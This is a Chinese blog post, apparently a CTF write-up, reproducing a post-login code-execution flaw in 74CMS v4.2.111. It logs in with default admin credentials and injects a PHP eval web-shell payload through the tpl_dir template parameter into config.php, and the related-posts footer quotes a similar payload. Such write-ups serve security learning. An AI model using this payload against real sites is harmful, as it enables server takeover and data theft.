骑士CMS01 74cms v4.2.111 后台getshell漏洞复现

已于 2022-09-25 18:44:01 修改
阅读量3.1k 收藏 2
点赞数 1
文章标签: 安全 web安全
于 2022-09-25 18:43:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63253040/article/details/127041028
版权

题目地址:

青少年CTF训练平台 | 原中学生CTF平台 | 青少年CTF

进入环境

 拉到最下面查看网站cms版本

百度搜索

 找个poc复现一下74CMS_v4.2.1-v4.2.129后台Getshell_FLy_鹏程万里的博客-CSDN博客

先进入网站后台/index.php?m=admin&c=index&a=login

 输入账号aaa回显管理员账号不存在,试试admin

 猜测账号就是admin了,貌似这里登录会验证,试试能不能爆破密码

 302跳转登录成功密码就是admin

进入后台找到工具=>风格模板=>可用模板,抓包

GET /index.php?m=admin&c=tpl&a=set&tpl_dir=default HTTP/1.1
Host: 8b6402a9-5fae-4e93-89b9-713c9db37bec.challenge.qsnctf.com:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://8b6402a9-5fae-4e93-89b9-713c9db37bec.challenge.qsnctf.com:8081/index.php?m=admin&c=tpl&a=index
Cookie: Hm_lvt_10309f8528ef7f3bdd779aa12ad6dc7e=1664077379,1664087665,1664100554; Hm_lpvt_10309f8528ef7f3bdd779aa12ad6dc7e=1664100567; td_cookie=1833576663; PHPSESSID=73nciph5rtj95ti9o99qd92781; think_language=zh-CN; think_template=default
Upgrade-Insecure-Requests: 1

修改tpl_dir的值为

','a',eval($_POST['cmd']),'

然后访问/Application/Home/Conf/config.php

 蚁剑连接找到flag

 

 

白塔河冲浪手
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
nnn2188185的博客
03-19 1412
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
74cms 5.0.1 版本命令执行漏洞复现
不忘初心,护天下安全!
10-20 2210
从整体分析来看,对site_domain的输入,只会使用trim,htmlspecialchars,stripslashes,strip_tags,think_filter这几个函数做过滤,对于执行php代码,写入shell,有影响的只有strip_tags,可以通过编码绕过正常的url.php文件内容如下,从之前的代码可以看出更新域名将更新domain和COOKIE_DOMAIN对应的值,原本的域名为74cms.com,写入到文件中会在最前面加一个.。
74cms骑士人才招聘系统源码SE版 v3.16.0
m0_57941469的博客
11-21 1958
74cms骑士人才招聘系统是一项基于PHP+MYSQL为核心开发的一套专业人才招聘系统。骑士人才系统拥有十多年的人才招聘系统运营解决方案,同时我们提供智能化招聘系统、招考系统等全方位系统化解决方案。74cms骑士人才招聘系统SE版:更懂运营的地方人才招聘系统SE版本拥有更易用的运营方案、更高效的技术方案、更智能的数据方案、更简洁的管理方案。骑士人才系统SE版,SE取自Special Edition的首字母,意为骑士人才系统特别版。提供免费版、创业版、标准版、专业版四个版本
74cms-v4.2.1-v4.2.129-后台文件写入导致的代码执行漏洞
公众号shadow sock7
02-11 1151
参考:https://xz.aliyun.com/t/3736 后台登录状态下,访问: /74cms_v4.2.111/index.php?m=admin&c=tpl&a=set&tpl_dir=',phpinfo(),' 即可将payload写入Application/Home/Conf/config.php. Application/Common/Control...
怎么修复网站漏洞 骑士cms漏洞修复方案
网站安全专家
01-03 786
骑士CMS是国内公司开发的一套开源人才网站系统,使用PHP语言开发以及mysql数据库的架构,2019年1月份被某安全组织检测出漏洞,目前最新版本4.2存在高危网站漏洞,通杀SQL注入漏洞,利用该网站漏洞可以获取网站的管理员账号密码以及用户账号信息. 目前很多人才网站都使用的骑士CMS系统,受影响的网站较多,关于该网站漏洞的详情我们来详细的分析一下。骑士cms4.2最新版本使用了thinkphp...
漏洞复现-骑士cms-代码执行】vulfocus/骑士cms_cve_2020_35339
10-13 1722
骑士cms-代码执行】植入到可执行的文件中
骑士CMS文件包含+getshell漏洞复现(python自动化验证扫描漏洞)
走在搬砖的路上!
08-02 3340
简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 +开源专业人才网站系统 公告地址: http://www.74cms.com/news/show-2497.html /Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行 影响版本 骑士 CMS < 6.0.48 环境搭建 这里使用phpstudy进.
74cms 5.0.1版本文件包含漏洞复现
ANYOUZHEN的博客
06-04 623
漏洞成因:由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。下载地址: 下载后解压到phpstudy的根目录www里面输入网址,http://127.0.0.1/upload/install.php一直点击下一步,输入数据库名称和密码进入系统抓个包看看将包中的domain后面的改成 base64里面的是phpinfo经过base64编码后得到的,使用bp上面的编码模块decode 然后我们点击send进行发包,看到返回后stat
74cms 骑士人才系统 v4.2.111 正式版
10-13
74cms 骑士人才系统 v4.2.111 正式版:构建高效开源的专业招聘平台》 74cms 骑士人才系统是一款专注于人力资源管理的软件,其最新版本v4.2.111提供了一个强大而稳定的开源平台,旨在帮助企业和组织高效地进行人才...
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
最新发布
04-08
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,利用 sqlmap与burpsuit注入,需具备php基础
74cms v4.2.X任意文件读取漏洞
09-06
在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上任意文件,这可能导致敏感信息泄露,甚至...
74cms 骑士人才系统 v4.2.66 正式版
12-30
综上所述,74cms骑士人才系统v4.2.66正式版以其强大的功能、优秀的性能以及开源的特性,为企业提供了一站式的招聘解决方案,是提升招聘效率和优化人才管理的有效工具。无论是小型创业公司还是大型企业,都可以从中...
骑士 74CMS V3.4漏洞
weixin_61842894的博客
02-07 817
骑士 74CMS V3.4
CMS 4.2.111 CSRF to RCE漏洞分析
weixin_33963189的博客
05-17 424
0x01 漏洞概述 74CMS是一套专业的人才招聘系统,其在后台更换风格模板的时候,未对参数tpl_dir的值进行严格过滤,导致危险的代码可以插入到配置文件中,进而导致任意命令执行。我在复现漏洞时发现,觉得这个漏洞更像是csrf导致的getshell。只要管理员点击攻击者构造的url,就可以插入危险代码导致命令执行。 74CMS 4.2.111下载地址:http://www.74cms....
74CMS_v4.2.1-v4.2.129后台Getshell
Fly_鹏程万里
06-23 1072
影响范围 74CMS v4.2.1~v4.2.129 漏洞危害 后台Getshell 攻击类型 后台Getshell 利用条件 登陆后台 漏洞简介 74CMS管理后台在更换模板时由于模板的路径参数可控且对参数的安全性考虑不全导致该参数可控,最终攻击者可以利用该处的设计向配置文件写入一句话木马,并Getshell漏洞分析 漏洞触发位置为TplController.class.php文件中的set函数: 74cms_Home_Setup_v4.2.111\74c...
骑士cms文件包含getshell复现
weixin_44508748的博客
12-14 1728
00X1 测试环境 骑士 CMS 6.0.48以下均存在此漏洞,本文复现使用骑士cms 6.0.20,下载地址: http://www.74cms.com/download/index.html 注意骑士cms不支持php7.x,复现php环境为php5.6。安装包下载完毕后直接在phpstudy下,访问upload/install.php进行安装,根据提示逐步安装即可。 00X2 漏洞复现 1.模板注入写入文件,POC http://192.168.23.128/74cms_v6.0.20/uplo
针对骑士cms的反射型xss漏洞
qq_67240733的博客
03-04 677
针对骑士cms的反射型xss漏洞攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值